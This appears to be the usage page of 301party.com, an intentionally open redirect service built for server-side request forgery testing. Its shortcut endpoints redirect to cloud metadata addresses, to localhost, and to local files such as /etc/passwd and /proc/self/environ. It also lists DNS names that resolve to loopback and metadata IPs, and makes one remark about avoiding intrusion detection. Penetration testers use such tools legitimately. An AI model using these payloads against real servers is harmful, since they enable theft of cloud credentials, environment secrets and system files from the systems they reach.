301party.com: the intentionally open redirect
Example usage:- /redirect?url=https://example.com&type=302 (URL-decodes the target: + becomes space and %xx is decoded; unescaped & starts another query parameter)
- /rawredirect?type=302&url=https://example.com (target taken verbatim; put control params before url)
- /{301,302,303,307,308}?url=http://example.com
- /metadata: shortcut for /redirect?url=http://169.254.169.254/latest/meta-data/
- /metadata6: shortcut for /redirect?url=http://[fd00:ec2::254]/latest/meta-data/
- /localhost: shortcut for /redirect?url=http://127.0.0.1
- /zeroes: shortcut for /redirect?url=http://0.0.0.0
- /passwd: shortcut for /redirect?url=file:///etc/passwd
- /services: shortcut for /redirect?url=file:///etc/services (avoid IDS maybe...)
- /environ: shortcut for /redirect?url=file:///proc/self/environ
Bonus DNS records!
- localhost.301party.com: 127.0.0.1
- metadata.301party.com: 169.254.169.254
- ipv6.metadata.301party.com: [::169.254.169.254]
DIY